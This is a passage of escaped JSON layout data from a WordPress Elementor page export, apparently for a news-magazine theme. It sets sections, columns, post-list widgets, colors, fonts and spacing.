"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"90zub0t\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"9wd6jr7\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"structure\":\"30\",\"section_sticky_element\":\"\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"so55224\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.961\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"gvq9sbs\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"3\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#4caf50\",\"category_bg_hover_color\":\"#4caf50\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"dghaq27\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"offset\":\"0\",\"category\":[\"1\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"56\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#266cc9\",\"category_bg_hover_color\":\"#266cc9\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"6uc2i0p\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"44.078\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"fb4g874\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"3\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"78.5\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"400\",\"height\":\"510\",\"category_bg_color\":\"#c9975f\",\"category_bg_hover_color\":\"#c9975f\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"48mal4x\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.960\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"x20xpc5\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"5\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#ea7441\",\"category_bg_hover_color\":\"#ea7441\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"y4m8rgg\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"6\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#e5e100\",\"category_bg_hover_color\":\"#e5e100\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_color1\":\"rgba(255,255,255,0.5)\",\"post_icon_color2\":\"rgba(255,255,255,0.5)\",\"post_icon_size\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"pzcs9rp\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"content_width\":{\"unit\":\"px\",\"size\":\"1170\"},\"gap\":\"no\",\"structure\":\"20\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":0,\"bottom\":\"50\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"gifizg0\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":\"65.004\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"ik44uj8\",\"elType\":\"widget\",\"settings\":{\"title\":\"Technlogie\",\"size\":\"medium\",\"align\":\"left\",\"title_color\":\"#038fc6\",\"typography_font_size\":{\"unit\":\"px\",\"size\":1}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"wnhjaaz\",\"elType\":\"widget\",\"settings\":{\"section_magzma_post_list\":\"\",\"posts_per_page\":\"4\",\"category\":[\"10\"],\"loop_infinite_class\":\"loop-infinte-list-1\",\"section_magzma_post_list_1_typhography_title\":\"\",\"post_icon_color1_post_list_1\":\"rgba(0,0,0,0.5)\",\"post_icon_color2_post_list_1\":\"rgba(0,0,0,0.5)\",\"post_icon_size_post_list_1_tablet\":{\"unit\":\"px\",\"size\":18},\"post_icon_size_post_list_1_mobile\":{\"unit\":\"px\",\"size\":18},\"post_icon_padding_post_list_1_tablet\":{\"unit\":\"px\",\"size\":10},\"post_icon_padding_post_list_1_mobile\":{\"unit\":\"px\",\"size\":10},\"post_list_1_view_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_view_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_view_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"post_list_1_view_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"post_list_1_view_font_weight_tablet\":\"600\",\"post_list_1_view_font_weight_mobile\":\"600\",\"typhography_category_post_list_1_background_color\":\"#00c5b5\",\"post_list1_category_background_hov_color\":\"#00c5b5\",\"post_list_1_category_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_category_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_category_font_size_tablet\":{\"unit\":\"px\",\"size\":12},\"post_list_1_category_font_size_mobile\":{\"unit\":\"px\",\"size\":12},\"post_list_1_category_font_weight_tablet\":\"600\",\"post_list_1_category_font_weight_mobile\":\"600\",\"typhography_title_post_list_1_hov_color\":\"#aaaaaa\",\"post_list_1_title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.25},\"post_list_1_title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.25},\"post_list_1_title_font_size\":{\"unit\":\"px\",\"size\":\"24\"},\"post_list_1_title_font_size_tablet\":{\"unit\":\"px\",\"size\":24},\"post_list_1_title_font_size_mobile\":{\"unit\":\"px\",\"size\":24},\"post_list_1_title_font_weight_tablet\":\"600\",\"post_list_1_title_font_weight_mobile\":\"600\",\"post_list1_meta_title_hov_color\":\"#00c5b5\",\"post_list_1_meta_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"post_list_1_meta_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"post_list_1_meta_font_weight_tablet\":\"600\",\"post_list_1_meta_font_weight_mobile\":\"600\",\"post_list_1_excerpt_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_excerpt_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_excerpt_font_size_tablet\":{\"unit\":\"px\",\"size\":18},\"post_list_1_excerpt_font_size_mobile\":{\"unit\":\"px\",\"size\":18},\"post_list_1_excerpt_word\":\"10\",\"use_read_more_post_list_1\":\"\",\"post_list1_read_more_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list1_read_more_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list1_read_more_font_size_tablet\":{\"unit\":\"px\",\"size\":18},\"post_list1_read_more_font_size_mobile\":{\"unit\":\"px\",\"size\":18},\"post_list1_read_more_font_weight_tablet\":\"400\",\"post_list1_read_more_font_weight_mobile\":\"400\",\"section_magzma_post_list_1_column_control\":\"\",\"horizontal_use\":\"left\",\"width\":\"600\",\"height\":\"395\",\"horizontal_col_select\":\"column-2\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"use_padding\":\"use\",\"padding_size_list_style_1\":{\"unit\":\"px\",\"size\":\"10\"},\"padding_size_list_style_1_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_list_style_1_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_post_list_animation_control\":\"\",\"animate\":\"fadeIn\",\"_section_style\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-5\",\"bottom\":\"0\",\"left\":\"-5\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-post-list-1\"},{\"id\":\"3j25kle\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"structure\":\"20\",\"section_sticky_element\":\"\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"q18cnb8\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[],\"isInner\":true},{\"id\":\"wg2jk1s\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"e37o4qh\",\"elType\":\"widget\",\"settings\":{\"section_magzma_post_list\":\"\",\"posts_per_page\":\"1\",\"category\":[\"5\"],\"loop_infinite_class\":\"loop-infinte-list-1\",\"section_magzma_post_list_1_typhography_title\":\"\",\"post_icon_size_post_list_1_tablet\":{\"unit\":\"px\",\"size\":18},\"post_icon_size_post_list_1_mobile\":{\"unit\":\"px\",\"size\":18},\"post_icon_padding_post_list_1_tablet\":{\"unit\":\"px\",\"size\":10},\"post_icon_padding_post_list_1_mobile\":{\"unit\":\"px\",\"size\":10},\"use_view_post_list_1\":\"\",\"post_list_1_view_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_view_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_view_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"post_list_1_view_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"post_list_1_view_font_weight_tablet\":\"600\",\"post_list_1_view_font_weight_mobile\":\"600\",\"typhography_category_post_list_1_background_color\":\"#ea7441\",\"post_list1_category_background_hov_color\":\"#ea7441\",\"post_list_1_category_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_category_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_category_font_size_tablet\":{\"unit\":\"px\",\"size\":12},\"post_list_1_category_font_size_mobile\":{\"unit\":\"px\",\"size\":12},\"post_list_1_category_font_weight_tablet\":\"600\",\"post_list_1_category_font_weight_mobile\":\"600\",\"typhography_title_post_list_1_hov_color\":\"#aaaaaa\",\"post_list_1_title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.25},\"post_list_1_title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.25},\"post_list_1_title_font_size\":{\"unit\":\"px\",\"size\":\"24\"},\"post_list_1_title_font_size_tablet\":{\"unit\":\"px\",\"size\":24},\"post_list_1_title_font_size_mobile\":{\"unit\":\"px\",\"size\":24},\"post_list_1_title_font_weight_tablet\":\"600\",\"post_list_1_title_font_weight_mobile\":\"600\",\"post_list1_meta_title_hov_color\":\"#aaaaaa\",\"post_list_1_meta_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"post_list_1_meta_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"post_list_1_meta_font_weight_tablet\":\"600\",\"post_list_1_meta_font_weight_mobile\":\"600\",\"post_list_1_excerpt_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_excerpt_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_excerpt_font_size_tablet\":{\"unit\":\"px\",\"size\":18},\"post_list_1_excerpt_font_size_mobile\":{\"unit\":\"px\",\"size\":18},\"post_list_1_excerpt_word\":\"10\",\"use_read_more_post_list_1\":\"\",\"post_list1_read_more_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list1_read_more_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list1_read_more_font_size_tablet\":{\"unit\":\"px\",\"size\":18},\"post_list1_read_more_font_size_mobile\":{\"unit\":\"px\",\"size\":18},\"post_list1_read_more_font_weight_tablet\":\"400\",\"post_list1_read_more_font_weight_mobile\":\"400\",\"section_magzma_post_list_1_column_control\":\"\",\"horizontal_use\":\"left\",\"width\":\"600\",\"height\":\"328\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_list_style_1_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_list_style_1_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_post_list_animation_control\":\"\",\"animate\":\"fadeIn\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-post-list-1\"}],\"isInner\":true}],\"isInner\":true},{\"id\":\"xn60yo4\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"structure\":\"20\",\"section_sticky_element\":\"\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"r